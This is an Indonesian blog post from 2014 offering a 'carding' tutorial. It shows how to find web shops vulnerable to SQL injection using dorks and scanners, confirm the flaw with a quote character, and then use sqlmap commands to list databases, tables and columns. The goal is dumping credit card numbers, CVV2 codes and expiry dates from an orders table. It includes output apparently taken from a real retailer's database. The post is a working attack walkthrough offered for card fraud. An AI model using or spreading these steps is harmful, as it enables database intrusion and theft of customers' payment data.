Sabtu, 15 November 2014

Tutorial Carding dengan Dork Backtrack

Tutorial Carding dengan Dork Backtrack

Kali ini saya akan mengepost tutorial Carding dengan Sqlmap,berhubungan saya tidak terlalu bisa dengan cara ini saya akan mengepost postingan dari web yg udah jago maen sqlmap










 Langsung aja eksekusi :D
Pertama kita siapkan tools" nya dahulu :
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

§     sqli scanner 1
§     sqli scanner 2
§     sqli scanner 3
Pertama ,ambil dork lalu scan menggunakan sqli scanner :
Klik Open Untuk Melihat Gambar : 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9GaAMz6VOozV7U8HgnEETjCZOgqMcAbbYqbIL7oxa9hUtBqmH2pJFwOZBZIdl1jFnYd38g0pwAwFhEyxZoPIScO4sfzyX4xg6R7MWU5bdfOI9ork-w07_K2Z8Qb1ai6rLH4jNOWAqe24/s320/1.png
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
Nah, web tersebut error saat kita inject ,


Klik Open Untuk Melihat Gambar : 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzXW79c93eA45xWapu9uIc1VbFl48fNfMmH_atIkx7sNHTa7-tkeB1QYw4ES0ecL2SX8dtpeCprJc07fiYl0HtDxAHYXUR6j3yMgLqNSvLgibhuQsDoyqJppE-UI1SV46uH-TQPm0OXJI/s320/2.png



Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :


Klik Open Untuk Melihat Gambar : 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAENbu32LtwruomzXPvUlqk7d41akSg8hun6Tx2eS1wSGMdylldUHgohdBVRBvZmDKk9NhA5hmUBEPgds3CVOTkOBqGR6PmEvFGv2HECFjq6RJQHKKLxGyc5xe4gJAQMEAstbCxSamzuY/s320/3.png




[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :


Klik Open Untuk Melihat Gambar : 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYXJA_eIyAQJi8ytfu6NJdGkspmHY30pi1P8-93_xn0Kvo2PvvLbEDpSMu31c7s7CiQ2TEBcDtFLO7O2uMMc23vXZgmqwoQpPI5RwcT5d0jD3p29N3KoQt76Fsxl7jOt6Frx3Kx3s0zE4/s320/4.png





Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns


Maka akan muncul seperti ini : 

Klik Open Untuk Melihat Gambar : 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUcj-fNu69ISKgvA6O2eB7Up505DcJetT_MW2XGRj6Hk0_iOhK8dbJM0fdY-VG1Ha8qYm51A9W_uL7eQpzf1nMRffBX5H-cblhXcIMYlUJlfqvKIsbqT10u9BR9M44lIKqlDyveWqKXC0/s320/5.png



Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)


Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)